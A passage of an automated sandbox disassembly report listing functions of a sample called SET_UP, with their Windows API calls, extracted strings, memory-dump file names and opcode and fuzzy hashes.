                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Drag$FileQuery$ActiveFinishWindow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 892977027-0
                                                                                                                                                                                                  • Opcode ID: a8d42b306c3d772316ff1157c96532ab61ea1a03eb1eb6276b26a22507ccb0c0
                                                                                                                                                                                                  • Instruction ID: c106cdc3879648c0d573561c976e84107bf0e7e657dca837769fd439845e6031
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8d42b306c3d772316ff1157c96532ab61ea1a03eb1eb6276b26a22507ccb0c0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA0186B5500118FFDF50AF65DC88D9E7B7CEF44358B20416AF11597061D774AE41CB64
                                                                                                                                                                                                  Function 004B9B3D Relevance: 6.0, APIs: 4, Instructions: 37windowCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004BBF53
                                                                                                                                                                                                  • DestroyMenu.USER32(?,?,?,?,004B9B29), ref: 004BBF72
                                                                                                                                                                                                  • DestroyMenu.USER32(?,?,?,?,004B9B29), ref: 004BBF7C
                                                                                                                                                                                                  • DestroyMenu.USER32(?,?,?,?,004B9B29), ref: 004BBF86
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DestroyMenu$H_prolog
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 750541241-0
                                                                                                                                                                                                  • Opcode ID: fd8d211a2e3a8ebc6b0b2a6f453a28a6485bf5702da75d3085b2e3bd1aa6f591
                                                                                                                                                                                                  • Instruction ID: 99caa705a6239e53fdde02640b4d800ed17decb9fa16345519263bbf287a318d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd8d211a2e3a8ebc6b0b2a6f453a28a6485bf5702da75d3085b2e3bd1aa6f591
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95F04471B106049BCB24AB7ACD01AAAB7EDEF40714B00466FE411D3690DBB8E901CEA8
                                                                                                                                                                                                  Function 00414C85 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CaptureKillTimer$Release
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1776425836-0
                                                                                                                                                                                                  • Opcode ID: 79c2c3b27fe8a6236bdcc52ead58f10df6d3314ecd3257bd9a8f90d4d868d9b2
                                                                                                                                                                                                  • Instruction ID: 6e73e1e30760d92423468ddd9b753e439b4c3916b1c7c44013f00dee74008877
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79c2c3b27fe8a6236bdcc52ead58f10df6d3314ecd3257bd9a8f90d4d868d9b2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4F09032300B519BD7312B71DD44FDFB3AAEF40715F00481AF246A6050CB7DA91187A8
                                                                                                                                                                                                  Function 00414E67 Relevance: 6.0, APIs: 4, Instructions: 33timeCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CaptureKillTimer$Release
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1776425836-0
                                                                                                                                                                                                  • Opcode ID: 383c1beb03c4f396697f1325fc66989deec7d1b5cfda1fd863b04f5527efe888
                                                                                                                                                                                                  • Instruction ID: ff70a55012874fdc0146c3e6bf6df41a332ff5847c315a7c8601179493dbd5c9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 383c1beb03c4f396697f1325fc66989deec7d1b5cfda1fd863b04f5527efe888
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7F0B4723007419BDB312B71DC40BDBB3A5EF40715F100C1AF247A6050C77DA8118778
                                                                                                                                                                                                  Function 004915DF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 259COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004915E4
                                                                                                                                                                                                    • Part of subcall function 00491DDA: __EH_prolog.LIBCMT ref: 00491DDF
                                                                                                                                                                                                    • Part of subcall function 00492D95: __EH_prolog.LIBCMT ref: 00492D9A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                  • String ID: Exceeded stackLimit in readValue().$Syntax error: value, object or array expected.
                                                                                                                                                                                                  • API String ID: 3519838083-359489996
                                                                                                                                                                                                  • Opcode ID: 7af6a54394ec40180cd9c8ff5db56878dfeee701f56978469e2c0eb50cdf0ec0
                                                                                                                                                                                                  • Instruction ID: cfa801ed9e9a2a7af0d91a73a2cc1985bfa47304c53fdb1a4e4b2a87808730bb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7af6a54394ec40180cd9c8ff5db56878dfeee701f56978469e2c0eb50cdf0ec0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6891B474E00605ABCF14FBF5C5998AEBBF8AF44304B10483FF55697291DE38AA05DB68
                                                                                                                                                                                                  Function 0041DB0D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0041DB12
                                                                                                                                                                                                  • WinHttpReadData.WINHTTP(?,?,?,?,00001000), ref: 0041DBB5
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DataH_prologHttpRead
                                                                                                                                                                                                  • String ID: 1M
                                                                                                                                                                                                  • API String ID: 3278886430-704753155
                                                                                                                                                                                                  • Opcode ID: 8b44370b316587bddc6ce752584c596cc0f630617f642b86ec4bd9a91d2570d0
                                                                                                                                                                                                  • Instruction ID: a6e999ba8dcf3b842485c55ff5508cf372f46ddb3b56b4afa9eaa97f6adf53fc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b44370b316587bddc6ce752584c596cc0f630617f642b86ec4bd9a91d2570d0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9512EB1D00619EFCF21CF99C8848EFFBB5FF58714B24451BE512A6260D7B99980CBA4
                                                                                                                                                                                                  Function 004A8FBF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Info
                                                                                                                                                                                                  • String ID: $
                                                                                                                                                                                                  • API String ID: 1807457897-3032137957
                                                                                                                                                                                                  • Opcode ID: 6685bd5710caf47db36117d3f6ba3b2ca0cdf46385baf7359c3e8aba6eb0113c
                                                                                                                                                                                                  • Instruction ID: b2a6834eef21ee8141538aec8bea9a30235e94c86c02e6cafd58c561184704ef
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6685bd5710caf47db36117d3f6ba3b2ca0cdf46385baf7359c3e8aba6eb0113c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA418B310081991AFF119754CCDABFB7FA8AB27744F1404E6D58AC7193C7694D08DBAA
                                                                                                                                                                                                  Function 00438831 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00438836
                                                                                                                                                                                                    • Part of subcall function 0041F220: __EH_prolog.LIBCMT ref: 0041F225
                                                                                                                                                                                                    • Part of subcall function 0041F220: GetTempPathW.KERNEL32(000003FF,00000000), ref: 0041F25B
                                                                                                                                                                                                    • Part of subcall function 0041C4D3: __EH_prolog.LIBCMT ref: 0041C4D8
                                                                                                                                                                                                    • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
                                                                                                                                                                                                    • Part of subcall function 00438388: __EH_prolog.LIBCMT ref: 0043838D
                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?), ref: 004388B0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog$Path$DecrementExistsFileInterlockedTemp
                                                                                                                                                                                                  • String ID: PXM
                                                                                                                                                                                                  • API String ID: 2388260370-3924958675
                                                                                                                                                                                                  • Opcode ID: 38260a97ff57835865193b216624458ae60894bd0ba5f705e4fe511154e020b0
                                                                                                                                                                                                  • Instruction ID: 6354a4a2cba8268f72c7872ae19cb3955391a778b45f9bead18b20ad310a4968
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38260a97ff57835865193b216624458ae60894bd0ba5f705e4fe511154e020b0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1341AC31801258EECF21EFA1CD4ABEDBB74AF18348F10419EF40562291EB794B58DF69
                                                                                                                                                                                                  Function 0042DC47 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 106COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0042DC4C
                                                                                                                                                                                                    • Part of subcall function 0042D435: __EH_prolog.LIBCMT ref: 0042D43A
                                                                                                                                                                                                    • Part of subcall function 0042D435: CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 0042D4A0
                                                                                                                                                                                                    • Part of subcall function 0042D4D6: CloseHandle.KERNEL32(?), ref: 0042D4E6
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog$CloseCreateFileHandle
                                                                                                                                                                                                  • String ID: $>M$1M
                                                                                                                                                                                                  • API String ID: 1152210893-4237397193
                                                                                                                                                                                                  • Opcode ID: 92905e79abaac3b4bb3be02fdf0ef01d5a5c0a7b11602f1022fbfdc39464bd62
                                                                                                                                                                                                  • Instruction ID: 0e57b2efdec3bdeeede20f454fb2bc40b0482048d2be2785a267b0e4cee3268f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92905e79abaac3b4bb3be02fdf0ef01d5a5c0a7b11602f1022fbfdc39464bd62
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30414BB0E00219ABDF15DFAAD590AEDFBB4AF14304F60806FE411A3281DB785A45CF59
                                                                                                                                                                                                  Function 00434245 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0043424A
                                                                                                                                                                                                  • PathFindExtensionW.SHLWAPI(?,?,?,?,00000000), ref: 0043426D
                                                                                                                                                                                                    • Part of subcall function 004B1F9A: lstrlenW.KERNEL32(00000000,00000000,?,?,004C4ED0,?,?,0041EFCC,?,00508FBC,AppFolder,00000000), ref: 004B1FC4
                                                                                                                                                                                                    • Part of subcall function 00434387: __EH_prolog.LIBCMT ref: 0043438C
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog$ExtensionFindPathlstrlen
                                                                                                                                                                                                  • String ID: .playlist
                                                                                                                                                                                                  • API String ID: 1411584661-513442779
                                                                                                                                                                                                  • Opcode ID: 635b9e36a317942322340f6ddc0930168f13c6d9da94c5b2c57f2627481d48f6
                                                                                                                                                                                                  • Instruction ID: d2a69bf3ffed2eea84caf7ef5a1810d74a78c6ac9be7616a86f98f504502e992
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 635b9e36a317942322340f6ddc0930168f13c6d9da94c5b2c57f2627481d48f6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF418F70A00205EFCB14EFA5C955BEDBB70AF14358F10426EF825672E1DB785E44CB55
                                                                                                                                                                                                  Function 0042CBA9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                  • String ID: ()[]\;:,<>$~!@#$%^&*()_=+\|[]{};:'",<>/?
                                                                                                                                                                                                  • API String ID: 3519838083-2959575185
                                                                                                                                                                                                  • Opcode ID: c2dad79a87278e4d46c91f2da2ab8bcc42dc11ea72a55fe1eda9b2ddc4f8c711
                                                                                                                                                                                                  • Instruction ID: 898933c0e5790896d28195a1d2ac55a8b0e229f416b80912efe200b89fb99118
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2dad79a87278e4d46c91f2da2ab8bcc42dc11ea72a55fe1eda9b2ddc4f8c711
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB31E6316101249BCF25EFA1DD86BFEB730EB14354F50411AF819671D1CBB85E84C6AD
                                                                                                                                                                                                  Function 0041DD19 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0041DD1E
                                                                                                                                                                                                    • Part of subcall function 004B20BD: lstrlenW.KERNEL32(00000000,?,?,004B1CC0,?,?,00403D3C,00000000,?,?,00403D1B,?,?,?,?,00403D01), ref: 004B20CE
                                                                                                                                                                                                    • Part of subcall function 004AF449: __EH_prolog.LIBCMT ref: 004AF44E
                                                                                                                                                                                                    • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
                                                                                                                                                                                                  • WinHttpCrackUrl.WINHTTP(?), ref: 0041DDDE
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
